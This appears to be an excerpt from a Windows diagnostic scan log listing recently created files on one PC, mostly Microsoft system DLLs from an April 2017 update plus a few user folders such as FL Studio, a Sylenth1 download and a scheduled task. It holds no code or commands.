2017-04-12 11:13 - 2017-03-28 07:18 - 01908224 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll
2017-04-12 11:13 - 2017-03-28 07:16 - 01217024 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Audio.dll
2017-04-12 11:13 - 2017-03-28 07:15 - 02390016 _____ (Microsoft Corporation) C:\WINDOWS\system32\smartscreen.exe
2017-04-12 11:13 - 2017-03-28 07:14 - 00947712 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVP9DEC.dll
2017-04-12 11:13 - 2017-03-28 07:12 - 00846336 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApiPublic.dll
2017-04-12 11:13 - 2017-03-28 07:11 - 00765440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Sensors.dll
2017-04-12 11:13 - 2017-03-28 07:09 - 01131008 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2017-04-12 11:13 - 2017-03-28 07:06 - 00999424 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2017-04-12 11:12 - 2017-03-28 08:12 - 00328008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll
2017-04-12 11:12 - 2017-03-28 08:11 - 01860288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2017-04-12 11:12 - 2017-03-28 08:11 - 00360040 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe
2017-04-12 11:12 - 2017-03-28 08:10 - 07220184 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2017-04-12 11:12 - 2017-03-28 08:05 - 08168512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-04-12 11:12 - 2017-03-28 08:05 - 04260576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2017-04-12 11:12 - 2017-03-28 07:58 - 00387872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpps.dll
2017-04-12 11:12 - 2017-03-28 07:38 - 00081408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2017-04-12 11:12 - 2017-03-28 07:31 - 00418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BlockedShutdown.dll
2017-04-12 11:12 - 2017-03-28 07:30 - 00748544 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
2017-04-12 11:12 - 2017-03-28 07:30 - 00692224 _____ (Microsoft Corporation) C:\WINDOWS\system32\CellularAPI.dll
2017-04-12 11:12 - 2017-03-28 07:29 - 00590336 _____ (Microsoft Corporation) C:\WINDOWS\system32\efswrt.dll
2017-04-12 11:12 - 2017-03-28 07:29 - 00088576 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2017-04-12 11:12 - 2017-03-28 07:28 - 00661504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-04-12 11:12 - 2017-03-28 07:28 - 00431616 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-04-12 11:12 - 2017-03-28 07:27 - 00671744 _____ (Microsoft Corporation) C:\WINDOWS\system32\mbsmsapi.dll
2017-04-12 11:12 - 2017-03-28 07:26 - 01145344 _____ (Microsoft Corporation) C:\WINDOWS\system32\EmailApis.dll
2017-04-12 11:12 - 2017-03-28 07:24 - 06288384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2017-04-12 11:12 - 2017-03-28 07:21 - 01403392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Editing.dll
2017-04-12 11:12 - 2017-03-28 07:19 - 07655424 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2017-04-12 11:12 - 2017-03-28 07:17 - 00279552 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToReceiver.dll
2017-04-12 11:12 - 2017-03-28 07:15 - 00467968 _____ (Microsoft Corporation) C:\WINDOWS\system32\Geolocation.dll
2017-04-12 11:12 - 2017-03-28 07:11 - 01981440 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2017-04-12 11:12 - 2017-03-28 07:10 - 08076288 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2017-04-12 11:12 - 2017-03-28 07:09 - 04149248 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpcorets.dll
2017-04-12 11:11 - 2017-03-28 08:28 - 07786336 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-04-12 11:11 - 2017-03-28 08:26 - 00603488 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContentDeliveryManager.Utilities.dll
2017-04-12 11:11 - 2017-03-28 08:22 - 02681200 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2017-04-12 11:11 - 2017-03-28 08:11 - 02187616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-04-12 11:11 - 2017-03-28 08:11 - 01738560 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2017-04-12 11:11 - 2017-03-28 08:11 - 00402784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgmms1.sys
2017-04-12 11:11 - 2017-03-28 08:10 - 02758648 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2017-04-12 11:11 - 2017-03-28 08:10 - 01157008 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinapi.appcore.dll
2017-04-12 11:11 - 2017-03-28 08:04 - 01276760 _____ (Microsoft Corporation) C:\WINDOWS\system32\ole32.dll
2017-04-12 11:11 - 2017-03-28 08:04 - 00241504 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2017-04-12 11:11 - 2017-03-28 08:04 - 00160088 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostBroker.dll
2017-04-12 11:11 - 2017-03-28 07:37 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\system32\DdcWnsListener.dll
2017-04-12 11:11 - 2017-03-28 07:36 - 00030208 _____ (Microsoft Corporation) C:\WINDOWS\system32\odbcconf.dll
2017-04-12 11:11 - 2017-03-28 07:35 - 00185344 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll
2017-04-12 11:11 - 2017-03-28 07:35 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Printers.dll
2017-04-12 11:11 - 2017-03-28 07:33 - 00270336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2017-04-12 11:11 - 2017-03-28 07:33 - 00182272 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceDirectoryClient.dll
2017-04-12 11:11 - 2017-03-28 07:32 - 00635904 _____ (Microsoft Corporation) C:\WINDOWS\system32\FlightSettings.dll
2017-04-12 11:11 - 2017-03-28 07:32 - 00306176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieproxy.dll
2017-04-12 11:11 - 2017-03-28 07:31 - 00343552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SmartCards.Phone.dll
2017-04-12 11:11 - 2017-03-28 07:31 - 00276992 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2017-04-12 11:11 - 2017-03-28 07:31 - 00236544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webcheck.dll
2017-04-12 11:11 - 2017-03-28 07:31 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\system32\ie4uinit.exe
2017-04-12 11:11 - 2017-03-28 07:31 - 00171520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SerialCommunication.dll
2017-04-12 11:11 - 2017-03-28 07:31 - 00144896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Lights.dll
2017-04-12 11:11 - 2017-03-28 07:30 - 00568320 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.LowLevel.dll
2017-04-12 11:11 - 2017-03-28 07:30 - 00505856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.WiFiDirect.dll
2017-04-12 11:11 - 2017-03-28 07:30 - 00340480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-04-12 11:11 - 2017-03-28 07:30 - 00239104 _____ (Microsoft Corporation) C:\WINDOWS\system32\dafpos.dll
2017-04-12 11:11 - 2017-03-28 07:29 - 00912384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.SmartCards.dll
2017-04-12 11:11 - 2017-03-28 07:29 - 00387584 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-04-12 11:11 - 2017-03-28 07:29 - 00311296 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncSettings.dll
2017-04-12 11:11 - 2017-03-28 07:29 - 00279552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.HumanInterfaceDevice.dll
2017-04-12 11:11 - 2017-03-28 07:28 - 00337408 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Picker.dll
2017-04-12 11:11 - 2017-03-28 07:28 - 00261632 _____ (Microsoft Corporation) C:\WINDOWS\system32\indexeddbserver.dll
2017-04-12 11:11 - 2017-03-28 07:27 - 00949248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.PointOfService.dll
2017-04-12 11:11 - 2017-03-28 07:27 - 00472064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll
2017-04-12 11:11 - 2017-03-28 07:26 - 00437248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Usb.dll
2017-04-12 11:11 - 2017-03-28 07:25 - 00262144 _____ (Microsoft Corporation) C:\WINDOWS\system32\webcheck.dll
2017-04-12 11:11 - 2017-03-28 07:23 - 00932864 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2017-04-12 11:11 - 2017-03-28 07:23 - 00691712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-04-12 11:11 - 2017-03-28 07:21 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\system32\CastLaunch.dll
2017-04-12 11:11 - 2017-03-28 07:20 - 01105408 _____ (Microsoft Corporation) C:\WINDOWS\system32\MiracastReceiver.dll
2017-04-12 11:11 - 2017-03-28 07:20 - 00090112 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmjpegdec.dll
2017-04-12 11:11 - 2017-03-28 07:19 - 00442368 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToDevice.dll
2017-04-12 11:11 - 2017-03-28 07:19 - 00235520 _____ (Microsoft Corporation) C:\WINDOWS\system32\flvprophandler.dll
2017-04-12 11:11 - 2017-03-28 07:15 - 00981504 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.OnlineId.dll
2017-04-12 11:11 - 2017-03-28 07:15 - 00945664 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpcWebFilter.dll
2017-04-12 11:11 - 2017-03-28 07:15 - 00937984 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll
2017-04-12 11:11 - 2017-03-28 07:15 - 00539136 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToManager.dll
2017-04-12 11:11 - 2017-03-28 07:14 - 00975872 _____ (Microsoft Corporation) C:\WINDOWS\HelpPane.exe
2017-04-12 11:11 - 2017-03-28 07:14 - 00913920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.dll
2017-04-12 11:11 - 2017-03-28 07:14 - 00800768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Web.Core.dll
2017-04-12 11:11 - 2017-03-28 07:14 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\system32\asycfilt.dll
2017-04-12 11:11 - 2017-03-28 07:13 - 02095616 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-04-12 11:11 - 2017-03-28 07:13 - 01040896 _____ (Microsoft Corporation) C:\WINDOWS\system32\NaturalLanguage6.dll
2017-04-12 11:11 - 2017-03-28 07:13 - 00759296 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-04-12 11:11 - 2017-03-28 07:13 - 00650752 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXService.dll
2017-04-12 11:11 - 2017-03-28 07:12 - 02208768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Graphics.Printing.3D.dll
2017-04-12 11:11 - 2017-03-28 07:12 - 02026496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-04-12 11:11 - 2017-03-28 07:12 - 01509376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieapfltr.dll
2017-04-12 11:11 - 2017-03-28 07:11 - 01275392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Bluetooth.dll
2017-04-12 11:11 - 2017-03-28 07:10 - 01783296 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2017-04-12 11:11 - 2017-03-28 07:10 - 01637888 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieapfltr.dll
2017-04-12 11:11 - 2017-03-28 07:10 - 01231872 _____ (Microsoft Corporation) C:\WINDOWS\system32\dosvc.dll
2017-04-12 11:11 - 2017-03-28 07:10 - 00875520 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBroker.dll
2017-04-12 11:11 - 2017-03-28 07:10 - 00774656 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.dll
2017-04-12 11:11 - 2017-03-28 07:09 - 01513472 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2017-04-12 11:11 - 2017-03-28 07:09 - 01328640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Web.Http.dll
2017-04-12 11:11 - 2017-03-28 07:08 - 02895872 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-04-12 11:11 - 2017-03-28 07:07 - 00908800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Search.dll
2017-04-12 11:11 - 2017-03-28 07:07 - 00701952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Connectivity.dll
2017-04-12 11:11 - 2017-03-28 07:07 - 00122368 _____ (Microsoft Corporation) C:\WINDOWS\system32\FontProvider.dll
2017-04-12 11:11 - 2017-03-28 07:06 - 00924672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.BackgroundTransfer.dll
2017-04-12 11:11 - 2017-03-28 07:05 - 01633792 _____ (Microsoft Corporation) C:\WINDOWS\system32\quartz.dll
2017-04-12 11:10 - 2017-03-28 07:37 - 22568960 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-04-12 11:10 - 2017-03-28 07:27 - 00425984 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadcloudap.dll
2017-04-12 11:10 - 2017-03-28 07:25 - 18364928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2017-04-12 11:10 - 2017-03-28 07:24 - 19416576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-04-12 11:10 - 2017-03-28 07:21 - 23681536 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-04-12 11:10 - 2017-03-28 07:21 - 01589760 _____ (Microsoft Corporation) C:\WINDOWS\system32\msdtctm.dll
2017-04-12 11:10 - 2017-03-28 07:18 - 12181504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2017-04-12 11:10 - 2017-03-28 07:17 - 13087232 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2017-04-12 11:10 - 2017-03-28 07:14 - 08126976 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-04-12 11:10 - 2017-03-28 07:13 - 06045184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2017-04-12 11:10 - 2017-03-28 07:13 - 04474368 _____ (Microsoft Corporation) C:\WINDOWS\system32\D3DCompiler_47.dll
2017-04-12 11:10 - 2017-03-28 07:12 - 05611008 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2017-04-12 11:10 - 2017-03-28 07:06 - 01121280 _____ (Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll
2017-04-12 11:09 - 2017-03-28 08:36 - 01617760 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2017-04-12 11:09 - 2017-03-28 08:36 - 01294688 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2017-04-12 11:09 - 2017-03-28 08:36 - 00565088 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2017-04-12 11:09 - 2017-03-28 08:36 - 00343904 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2017-04-12 11:09 - 2017-03-28 08:36 - 00142176 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2017-04-12 11:09 - 2017-03-28 08:35 - 00379232 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2017-04-12 11:09 - 2017-03-28 08:20 - 00764392 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreMessaging.dll
2017-04-12 11:09 - 2017-03-28 08:10 - 00178528 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostUser.dll
2017-04-12 11:09 - 2017-03-28 08:10 - 00146776 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostCommon.dll
2017-04-12 11:09 - 2017-03-28 08:09 - 02446704 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml6.dll
2017-04-12 11:09 - 2017-03-28 08:09 - 00682816 _____ (Microsoft Corporation) C:\WINDOWS\system32\wer.dll
2017-04-12 11:09 - 2017-03-28 08:09 - 00624048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2017-04-12 11:09 - 2017-03-28 08:08 - 01100128 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-04-12 11:09 - 2017-03-28 08:08 - 00989024 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-04-12 11:09 - 2017-03-28 08:00 - 01569184 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2017-04-12 11:09 - 2017-03-28 08:00 - 00628552 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-04-12 11:09 - 2017-03-28 07:58 - 00372440 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.MediaControl.dll
2017-04-12 11:09 - 2017-03-28 07:38 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIRibbonRes.dll
2017-04-12 11:09 - 2017-03-28 07:37 - 00078848 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManagerProxy.dll
2017-04-12 11:09 - 2017-03-28 07:36 - 00584192 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIRibbonRes.dll
2017-04-12 11:09 - 2017-03-28 07:36 - 00045056 _____ (Adobe Systems) C:\WINDOWS\system32\atmlib.dll
2017-04-12 11:09 - 2017-03-28 07:35 - 00156160 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.Client.dll
2017-04-12 11:09 - 2017-03-28 07:35 - 00124416 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.SystemManagement.dll
2017-04-12 11:09 - 2017-03-28 07:34 - 00259072 _____ (Microsoft Corporation) C:\WINDOWS\system32\Family.SyncEngine.dll
2017-04-12 11:09 - 2017-03-28 07:34 - 00162304 _____ (Microsoft Corporation) C:\WINDOWS\system32\dmcertinst.exe
2017-04-12 11:09 - 2017-03-28 07:34 - 00129536 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_ClosedCaptioning.dll
2017-04-12 11:09 - 2017-03-28 07:34 - 00088064 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthTokenBrokerExt.dll
2017-04-12 11:09 - 2017-03-28 07:33 - 00196096 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDeviceRegistration.dll
2017-04-12 11:09 - 2017-03-28 07:33 - 00193536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.WiFi.dll
2017-04-12 11:09 - 2017-03-28 07:33 - 00122880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryClient.dll
2017-04-12 11:09 - 2017-03-28 07:33 - 00101888 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDeviceRegistration.Ngc.dll
2017-04-12 11:09 - 2017-03-28 07:33 - 00082432 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.UserDeviceAssociation.dll
2017-04-12 11:09 - 2017-03-28 07:32 - 00368640 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneBackupHandler.dll
2017-04-12 11:09 - 2017-03-28 07:32 - 00186368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Radios.dll
2017-04-12 11:09 - 2017-03-28 07:31 - 00547840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Gaming.Input.dll
2017-04-12 11:09 - 2017-03-28 07:31 - 00289792 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeveloperOptionsSettingsHandlers.dll
2017-04-12 11:09 - 2017-03-28 07:31 - 00257024 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudDomainJoinDataModelServer.dll
2017-04-12 11:09 - 2017-03-28 07:30 - 00651264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.AllJoyn.dll
2017-04-12 11:09 - 2017-03-28 07:30 - 00268800 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserMgrProxy.dll
2017-04-12 11:09 - 2017-03-28 07:30 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBrokerUI.dll
2017-04-12 11:09 - 2017-03-28 07:29 - 00852480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Import.dll
2017-04-12 11:09 - 2017-03-28 07:29 - 00391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleacc.dll
2017-04-12 11:09 - 2017-03-28 07:29 - 00379904 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepsync.dll
2017-04-12 11:09 - 2017-03-28 07:29 - 00324608 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.LockScreen.dll
2017-04-12 11:09 - 2017-03-28 07:29 - 00267264 _____ (Microsoft Corporation) C:\WINDOWS\system32\vaultcli.dll
2017-04-12 11:09 - 2017-03-28 07:29 - 00206336 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2017-04-12 11:09 - 2017-03-28 07:29 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
2017-04-12 11:09 - 2017-03-28 07:29 - 00146432 _____ (Microsoft Corporation) C:\WINDOWS\system32\AuthBroker.dll
2017-04-12 11:09 - 2017-03-28 07:28 - 00407552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Management.dll
2017-04-12 11:09 - 2017-03-28 07:28 - 00176128 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepapi.dll
2017-04-12 11:09 - 2017-03-28 07:27 - 01060352 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppContracts.dll
2017-04-12 11:09 - 2017-03-28 07:27 - 00645120 _____ (Microsoft Corporation) C:\WINDOWS\system32\qedit.dll
2017-04-12 11:09 - 2017-03-28 07:27 - 00091136 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatepolicy.dll
2017-04-12 11:09 - 2017-03-28 07:26 - 00329728 _____ (Microsoft Corporation) C:\WINDOWS\system32\deviceaccess.dll
2017-04-12 11:09 - 2017-03-28 07:25 - 01010176 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2017-04-12 11:09 - 2017-03-28 07:25 - 00966144 _____ (Microsoft Corporation) C:\WINDOWS\system32\sbe.dll
2017-04-12 11:09 - 2017-03-28 07:25 - 00896512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AccountsControl.dll
2017-04-12 11:09 - 2017-03-28 07:25 - 00775168 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe
2017-04-12 11:09 - 2017-03-28 07:24 - 00410112 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll
2017-04-12 11:09 - 2017-03-28 07:23 - 00073728 _____ (Microsoft Corporation) C:\WINDOWS\system32\WSManMigrationPlugin.dll
2017-04-12 11:09 - 2017-03-28 07:19 - 00295424 _____ (Microsoft Corporation) C:\WINDOWS\system32\dlnashext.dll
2017-04-12 11:09 - 2017-03-28 07:16 - 00167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\ErrorDetails.dll
2017-04-12 11:09 - 2017-03-28 07:16 - 00061952 _____ (Microsoft Corporation) C:\WINDOWS\system32\vss_ps.dll
2017-04-12 11:09 - 2017-03-28 07:15 - 00139776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Devices.dll
2017-04-12 11:09 - 2017-03-28 07:14 - 01643008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Speech.dll
2017-04-12 11:09 - 2017-03-28 07:14 - 00869888 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuapi.dll
2017-04-12 11:09 - 2017-03-28 07:13 - 01359872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2017-04-12 11:09 - 2017-03-28 07:13 - 00460800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Midi.dll
2017-04-12 11:09 - 2017-03-28 07:12 - 00376832 _____ (Microsoft Corporation) C:\WINDOWS\system32\CryptoWinRT.dll
2017-04-12 11:09 - 2017-03-28 07:11 - 02914816 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2017-04-12 11:09 - 2017-03-28 07:10 - 01586176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Globalization.dll
2017-04-12 11:09 - 2017-03-28 07:09 - 01064448 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2017-04-12 11:09 - 2017-03-28 07:09 - 00716800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShareHost.dll
2017-04-12 11:09 - 2017-03-28 07:08 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\system32\enrollmentapi.dll
2017-04-12 11:09 - 2017-03-16 06:47 - 00038768 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompPkgSup.dll
2017-04-12 11:08 - 2017-03-28 08:08 - 01267504 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2017-04-12 11:08 - 2017-03-28 08:04 - 01600632 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
2017-04-12 11:08 - 2017-03-28 07:44 - 07216640 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2017-04-12 11:08 - 2017-03-28 07:23 - 09130496 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2017-04-12 11:08 - 2017-03-28 07:17 - 05114368 _____ (Microsoft Corporation) C:\WINDOWS\system32\cdp.dll
2017-04-12 11:08 - 2017-03-28 07:17 - 04749312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll
2017-04-12 11:08 - 2017-03-28 07:14 - 01692160 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.onecore.dll
2017-04-12 11:08 - 2017-03-28 07:10 - 02316288 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuaueng.dll
2017-04-12 11:08 - 2017-03-28 07:08 - 03612672 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-04-12 11:08 - 2017-03-28 07:08 - 03542016 _____ (Microsoft Corporation) C:\WINDOWS\system32\actxprxy.dll
2017-04-12 11:08 - 2017-03-18 18:50 - 00956416 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentExtensions.desktop.dll
2017-04-12 11:08 - 2017-03-18 18:35 - 02278400 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2017-04-10 20:07 - 2017-04-13 14:56 - 00003664 _____ C:\WINDOWS\System32\Tasks\PowerWord-SCT-JT
2017-04-09 13:49 - 2015-07-09 03:11 - 699688757 _____ C:\Users\Emil\Desktop\Wesele Malwiny i Emila.mp4
2017-04-09 01:32 - 2017-04-09 01:32 - 02146080 _____ C:\Users\Emil\Desktop\bITH 09.04.17.flp
2017-04-09 00:25 - 2017-04-09 00:25 - 00001553 _____ C:\Users\Emil\Desktop\FL Studio 12.lnk
2017-04-09 00:25 - 2017-04-09 00:25 - 00000000 ____D C:\VstPlugins
2017-04-09 00:16 - 2017-04-09 00:16 - 00000000 ____D C:\sylenthhh
2017-04-09 00:16 - 2017-04-09 00:16 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Sylenth1
2017-04-09 00:14 - 2017-04-09 00:14 - 00000000 ____D C:\Users\Emil\Downloads\Lennar_Digital_Sylenth1_V2.2.1_Windows_8_Fix_130_Presets
2017-04-09 00:12 - 2017-04-09 00:25 - 00000000 ____D C:\FL Studio 12.4.2
2017-04-08 23:56 - 2017-04-08 23:57 - 00000000 ____D C:\Users\Emil\AppData\Local\Runefall
